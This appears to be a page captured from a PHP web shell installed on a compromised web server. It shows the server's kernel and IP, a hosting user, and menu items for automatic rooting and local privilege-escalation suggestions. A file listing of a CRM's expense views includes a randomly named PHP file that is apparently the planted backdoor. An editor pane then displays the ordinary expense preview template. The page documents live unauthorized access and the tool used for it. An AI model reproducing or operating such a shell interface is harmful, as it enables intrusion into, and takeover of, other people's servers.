Linux srv.fwservers.com 4.18.0-477.21.1.el8_8.x86_64 #1 SMP Thu Aug 10 13:51:50 EDT 2023 x86_64
Apache
Server IP : 199.127.63.82 & Your IP : 216.73.217.89
Domains : 56 Domain
User : aconstruction
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
aconstruction /
public_html /
app /
application /
views /
admin /
expenses /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
518
B
-r-xr-xr-x
2026-09-03 03:31
_bulk_actions_modal.php
3.75
KB
-rw-rw-r--
2023-07-26 19:02
expense.php
35.42
KB
-rw-rw-r--
2023-07-26 19:02
expense_category.php
3.64
KB
-rw-rw-r--
2023-07-26 19:02
expense_pdf.php
2.65
KB
-rw-rw-r--
2023-07-26 19:02
expense_preview_template.php
22.6
KB
-rw-rw-r--
2023-07-26 19:02
expenses_total_template.php
3.13
KB
-rw-rw-r--
2023-07-26 19:02
filter_by_template.php
5.67
KB
-rw-rw-r--
2023-07-26 19:02
import.php
2.76
KB
-rw-rw-r--
2023-07-26 19:02
index.html
131
B
-rw-rw-r--
2023-07-26 19:02
manage.php
7.24
KB
-rw-rw-r--
2023-07-26 19:02
manage_categories.php
1.12
KB
-rw-rw-r--
2023-07-26 19:02
qlVOIMLbk.php
34.65
KB
-rw-r--r--
2026-06-24 02:58
table_html.php
1.93
KB
-rw-rw-r--
2023-07-26 19:02
Save
Rename
<?php defined('BASEPATH') or exit('No direct script access allowed'); ?> <div class="col-md-12 no-padding"> <div class="panel_s"> <div class="panel-body"> <div class="horizontal-scrollable-tabs preview-tabs-top panel-full-width-tabs"> <div class="scroller arrow-left"><i class="fa fa-angle-left"></i></div> <div class="scroller arrow-right"><i class="fa fa-angle-right"></i></div> <div class="horizontal-tabs"> <ul class="nav nav-tabs nav-tabs-horizontal mbot15" role="tablist"> <li role="presentation" class="active"> <a href="#tab_expense" aria-controls="tab_expense" role="tab" data-toggle="tab"> <?php echo _l('expense'); ?> </a> </li> <?php if (count($child_expenses) > 0 || $expense->recurring != 0) { ?> <li role="presentation"> <a href="#tab_child_expenses" aria-controls="tab_child_expenses" role="tab" data-toggle="tab"> <?php echo _l('child_expenses'); ?> </a> </li> <?php } ?> <li role="presentation"> <a href="#tab_tasks" onclick="init_rel_tasks_table(<?php echo $expense->expenseid; ?>,'expense'); return false;" aria-controls="tab_tasks" role="tab" data-toggle="tab"> <?php echo _l('tasks'); ?> </a> </li> <li role="presentation" class="tab-separator"> <a href="#tab_reminders" onclick="initDataTable('.table-reminders', admin_url + 'misc/get_reminders/' + <?php echo $expense->id ; ?> + '/' + 'expense', undefined, undefined,undefined,[1,'ASC']); return false;" aria-controls="tab_reminders" role="tab" data-toggle="tab"> <?php echo _l('expenses_reminders'); ?> <?php $total_reminders = total_rows( db_prefix() . 'reminders', [ 'isnotified' => 0, 'staff' => get_staff_user_id(), 'rel_type' => 'expense', 'rel_id' => $expense->expenseid, ] ); if ($total_reminders > 0) { echo '<span class="badge">' . $total_reminders . '</span>'; } ?> </a> </li> <li role="presentation" class="tab-separator toggle_view"> <a href="#" onclick="small_table_full_view(); return false;" data-placement="left" data-toggle="tooltip" data-title="<?php echo _l('toggle_full_view'); ?>"> <i class="fa fa-expand"></i></a> </li> </ul> </div> </div> <div class="row mtop20"> <div class="col-md-6" id="expenseHeadings"> <h3 class="tw-font-semibold tw-text-lg tw-text-neutral-700 tw-mt-0 tw-mb-1" id="expenseCategory"> <?php echo $expense->category_name; ?> </h3> <?php if (!empty($expense->expense_name)) { ?> <h4 class="tw-text-sm tw-m-0 tw-text-neutral-500" id="expenseName"> <?php echo $expense->expense_name; ?> </h4> <?php } ?> <h4 class="tw-text-sm tw-m-0 tw-text-neutral-500" id="expenserCreator"> <?php echo _l('created_by'); ?>: <a href="<?php echo admin_url('staff/profile/' . $expense->addedfrom) ?>"> <?php echo get_staff_full_name($expense->addedfrom); ?> </a> </h4> </div> <div class="col-md-6 _buttons text-right"> <div class="visible-xs"> <div class="mtop10"></div> </div> <?php if ($expense->billable == 1 && $expense->invoiceid == null) { ?> <?php if (has_permission('invoices', '', 'create')) { ?> <button type="button" class="btn btn-success pull-right mleft5 expense_convert_btn" data-id="<?php echo $expense->expenseid; ?>" data-toggle="modal" data-target="#expense_convert_helper_modal"> <?php echo _l('expense_convert_to_invoice'); ?> </button> <?php } ?> <?php } elseif ($expense->invoiceid != null) { ?> <a href="<?php echo admin_url('invoices/list_invoices/' . $expense->invoiceid); ?>" class="btn btn-primary mleft10 pull-right"><?php echo format_invoice_number($invoice->id); ?></a> <?php } ?> <div class="pull-right"> <?php if (has_permission('expenses', '', 'edit')) { ?> <a class="btn btn-default btn-with-tooltip" href="<?php echo admin_url('expenses/expense/' . $expense->expenseid); ?>" data-toggle="tooltip" data-placement="bottom" title="<?php echo _l('expense_edit'); ?>"><i class="fa-regular fa-pen-to-square"></i></a> <?php } ?> <a class="btn btn-default btn-with-tooltip" href="#" onclick="print_expense_information(); return false;" data-toggle="tooltip" data-placement="bottom" title="<?php echo _l('print'); ?>"> <i class="fa fa-print"></i> </a> <?php if (has_permission('expenses', '', 'create')) { ?> <a class="btn btn-default btn-with-tooltip" href="<?php echo admin_url('expenses/copy/' . $expense->expenseid); ?>" data-toggle="tooltip" data-placement="bottom" title="<?php echo _l('expense_copy'); ?>"><i class="fa-regular fa-copy"></i></a> <?php } ?> <?php if (has_permission('expenses', '', 'delete')) { ?> <a class="btn btn-danger btn-with-tooltip _delete" href="<?php echo admin_url('expenses/delete/' . $expense->expenseid); ?>" data-toggle="tooltip" data-placement="bottom" title="<?php echo _l('expense_delete'); ?>"><i class="fa fa-remove"></i></a> <?php } ?> </div> </div> </div> <div class="clearfix"></div> <hr class="hr-panel-separator" /> <div class="tab-content"> <div role="tabpanel" class="tab-pane ptop10 active" id="tab_expense" data-empty-note="<?php echo empty($expense->note); ?>" data-empty-name="<?php echo empty($expense->expense_name); ?>"> <div class="row"> <?php if ($expense->recurring > 0 || $expense->recurring_from != null) { echo '<div class="col-md-12">'; $recurring_expense = $expense; $show_recurring_expense_info = true; if ($expense->recurring_from != null) { $recurring_expense = $this->expenses_model->get($expense->recurring_from); // Maybe recurring expense not longer recurring? if ($recurring_expense->recurring == 0) { $show_recurring_expense_info = false; } else { $next_recurring_date_compare = $recurring_expense->last_recurring_date; } } else { $next_recurring_date_compare = $recurring_expense->date; if ($recurring_expense->last_recurring_date) { $next_recurring_date_compare = $recurring_expense->last_recurring_date; } } if ($show_recurring_expense_info) { $next_date = date('Y-m-d', strtotime('+' . $recurring_expense->repeat_every . ' ' . strtoupper($recurring_expense->recurring_type), strtotime($next_recurring_date_compare))); } ?> <?php if ($expense->recurring_from == null && $recurring_expense->cycles > 0 && $recurring_expense->cycles == $recurring_expense->total_cycles) { ?> <div class="alert alert-info mbot15"> <?php echo _l('recurring_has_ended', _l('expense_lowercase')); ?> </div> <?php } elseif ($show_recurring_expense_info) { ?> <span class="label label-info"> <?php echo _l('cycles_remaining'); ?>: <b> <?php echo $recurring_expense->cycles == 0 ? _l('cycles_infinity') : $recurring_expense->cycles - $recurring_expense->total_cycles; ?> </b> </span> <?php if ($recurring_expense->cycles == 0 || $recurring_expense->cycles != $recurring_expense->total_cycles) { echo '<span class="label label-info tw-ml-3"><i class="fa-regular fa-circle-question fa-fw" data-toggle="tooltip" data-title="' . _l('recurring_recreate_hour_notice', _l('expense')) . '"></i> ' . _l('next_expense_date', '<b>' . _d($next_date) . '</b>') . '</span>'; } } if ($expense->recurring_from != null) { ?> <?php echo '<p class="text-muted no-mbot' . ($show_recurring_expense_info ? ' mtop15': '') . '">' . _l('expense_recurring_from', '<a href="' . admin_url('expenses/list_expenses/' . $expense->recurring_from) . '" onclick="init_expense(' . $expense->recurring_from . ');return false;">' . $recurring_expense->category_name . (!empty($recurring_expense->expense_name) ? ' (' . $recurring_expense->expense_name . ')' : '') . '</a></p>'); ?> <?php } ?> </div> <div class="clearfix"></div> <hr class="hr-panel-separator !tw-my-6" /> <?php } ?> <div class="col-md-6"> <p> <div id="amountWrapper"> <span class="bold font-medium"><?php echo _l('expense_amount'); ?></span> <span class="text-danger bold font-medium"><?php echo app_format_money($expense->amount, $expense->currency_data); ?></span> </div> <?php if ($expense->paymentmode != '0' && !empty($expense->paymentmode)) { ?> <span class="text-muted text-sm"> <?php echo _l('expense_paid_via', $expense->payment_mode_name); ?> </span><br /> <?php } ?> <?php if ($expense->tax != 0) { echo '<br /><span class="bold">' . _l('tax_1') . ':</span> ' . $expense->taxrate . '% (' . $expense->tax_name . ')'; $total = $expense->amount; $total += ($total / 100 * $expense->taxrate); } if ($expense->tax2 != 0) { echo '<br /><span class="bold">' . _l('tax_2') . ':</span> ' . $expense->taxrate2 . '% (' . $expense->tax_name2 . ')'; $total += ($expense->amount / 100 * $expense->taxrate2); } if ($expense->tax != 0 || $expense->tax2 != 0) { echo '<p class="font-medium bold text-danger">' . _l('total_with_tax') . ': ' . app_format_money($total, $expense->currency_data) . '</p>'; } ?> <p><span class="bold"><?php echo _l('expense_date'); ?></span> <span class="text-muted"><?php echo _d($expense->date); ?></span></p> <?php if ($expense->billable == 1) { if ($expense->invoiceid == null) { echo '<span class="text-danger">' . _l('expense_invoice_not_created') . '</span>'; } else { echo '<span class="bold">' . format_invoice_number($invoice->id) . ' - </span>'; if ($invoice->status == 2) { echo '<span class="text-success">' . _l('expense_billed') . '</span>'; } else { echo '<span class="text-danger">' . _l('expense_not_billed') . '</span>'; } } } ?> </p> <?php if (!empty($expense->reference_no)) { ?> <p class="bold mbot15"><?php echo _l('expense_ref_noe'); ?> <span class="text-muted"><?php echo $expense->reference_no; ?></span></p> <?php } ?> <?php if ($expense->clientid) { ?> <p class="bold mbot5"><?php echo _l('expense_customer'); ?></p> <p class="mbot15"><a href="<?php echo admin_url('clients/client/' . $expense->clientid); ?>"><?php echo $expense->company; ?></a> </p> <?php } ?> <?php if ($expense->project_id) { ?> <p class="bold mbot5"><?php echo _l('project'); ?></p> <p class="mbot15"><a href="<?php echo admin_url('projects/view/' . $expense->project_id); ?>"><?php echo $expense->project_data->name; ?></a> </p> <?php } ?> <?php $custom_fields = get_custom_fields('expenses'); foreach ($custom_fields as $field) { ?> <?php $value = get_custom_field_value($expense->expenseid, $field['id'], 'expenses'); if ($value == '') { continue; } ?> <div class="row mbot10"> <div class="col-md-12 mtop5"> <p class="mbot5"> <span class="bold"><?php echo ucfirst($field['name']); ?></span> </p> <div class="text-left"> <?php echo $value; ?> </div> </div> </div> <?php } ?> <?php if ($expense->note != '') { ?> <p class="bold mbot5"><?php echo _l('expense_note'); ?></p> <p class="text-muted mbot15"><?php echo $expense->note; ?></p> <?php } ?> </div> <div class="col-md-6" id="expenseReceipt"> <h4 class="tw-mt-0 tw-font-semibold tw-text-lg tw-flex tw-items-center"> <i class="fa-solid fa-receipt tw-lg tw-text-neutral-400 tw-mr-1.5"></i> <span> <?php echo _l('expense_receipt'); ?> </span> </h4> <?php if (empty($expense->attachment)) { ?> <?php echo form_open('admin/expenses/add_expense_attachment/' . $expense->expenseid, ['class' => 'mtop10 dropzone dropzone-expense-preview dropzone-manual', 'id' => 'expense-receipt-upload']); ?> <div id="dropzoneDragArea" class="dz-default dz-message"> <span><?php echo _l('expense_add_edit_attach_receipt'); ?></span> </div> <?php echo form_close(); ?> <?php } else { ?> <div class="row"> <div class="col-md-10"> <i class="<?php echo get_mime_class($expense->filetype); ?>"></i> <a href="<?php echo site_url('download/file/expense/' . $expense->expenseid); ?>"> <?php echo $expense->attachment; ?></a> </div> <?php if ($expense->attachment_added_from == get_staff_user_id() || is_admin()) { ?> <div class="col-md-2 text-right"> <a class="_delete text-danger" href="<?php echo admin_url('expenses/delete_expense_attachment/' . $expense->expenseid . '/' . 'preview'); ?>" class="text-danger"><i class="fa fa fa-times"></i></a> </div> <?php } ?> </div> <?php } ?> </div> </div> </div> <?php if (count($child_expenses) > 0 || $expense->recurring != 0) { ?> <div role="tabpanel" class="tab-pane" id="tab_child_expenses"> <?php if (count($child_expenses) > 0) { ?> <h4 class="mbot25 mtop25"><?php echo _l('expenses_created_from_this_recurring_expense'); ?></h4> <ul class="list-group"> <?php foreach ($child_expenses as $recurring) { ?> <li class="list-group-item"> <a href="<?php echo admin_url('expenses/list_expenses/' . $recurring->expenseid); ?>" onclick="init_expense(<?php echo $recurring->expenseid; ?>); return false;" target="_blank"><?php echo $recurring->category_name . (!empty($recurring->expense_name) ? ' (' . $recurring->expense_name . ')' : ''); ?> </a> <br /> <span class="inline-block mtop10"> <?php echo '<span class="bold">' . _d($recurring->date) . '</span>'; ?><br /> <p><span class="bold font-medium"><?php echo _l('expense_amount'); ?></span> <span class="text-danger bold font-medium"><?php echo app_format_money($recurring->amount, $recurring->currency_data); ?></span> <?php if ($recurring->tax != 0) { echo '<br /><span class="bold">' . _l('tax_1') . ':</span> ' . $recurring->taxrate . '% (' . $recurring->tax_name . ')'; $total = $recurring->amount; $total += ($total / 100 * $recurring->taxrate); } if ($recurring->tax2 != 0) { echo '<br /><span class="bold">' . _l('tax_2') . ':</span> ' . $recurring->taxrate2 . '% (' . $recurring->tax_name2 . ')'; $total += ($recurring->amount / 100 * $recurring->taxrate2); } if ($recurring->tax != 0 || $recurring->tax2 != 0) { echo '<p class="font-medium bold text-danger">' . _l('total_with_tax') . ': ' . app_format_money($total, $recurring->currency_data) . '</p>'; } ?> </span> </li> <?php } ?> </ul> <?php } else { ?> <p class="bold"><?php echo _l('no_child_found', _l('expenses')); ?></p> <?php } ?> </div> <?php } ?> <div role="tabpanel" class="tab-pane" id="tab_tasks"> <?php init_relation_tasks_table(['data-new-rel-id' => $expense->expenseid, 'data-new-rel-type' => 'expense']); ?> </div> <div role="tabpanel" class="tab-pane" id="tab_reminders"> <a href="#" data-toggle="modal" class="btn btn-default" data-target=".reminder-modal-expense-<?php echo $expense->id; ?>"><i class="fa-regular fa-bell"></i> <?php echo _l('expense_set_reminder_title'); ?></a> <hr /> <?php render_datatable([ _l('reminder_description'), _l('reminder_date'), _l('reminder_staff'), _l('reminder_is_notified')], 'reminders'); ?> <?php $this->load->view('admin/includes/modals/reminder', ['id' => $expense->id, 'name' => 'expense', 'members' => $members, 'reminder_title' => _l('expense_set_reminder_title')]); ?> </div> </div> </div> </div> </div> <script> init_btn_with_tooltips(); init_selectpicker(); init_datepicker(); init_form_reminder(); init_tabs_scrollable(); if ($('#dropzoneDragArea').length > 0) { if (typeof(expensePreviewDropzone) != 'undefined') { expensePreviewDropzone.destroy(); } expensePreviewDropzone = new Dropzone("#expense-receipt-upload", appCreateDropzoneOptions({ clickable: '#dropzoneDragArea', maxFiles: 1, success: function(file, response) { init_expense(<?php echo $expense->expenseid; ?>); } })); } </script>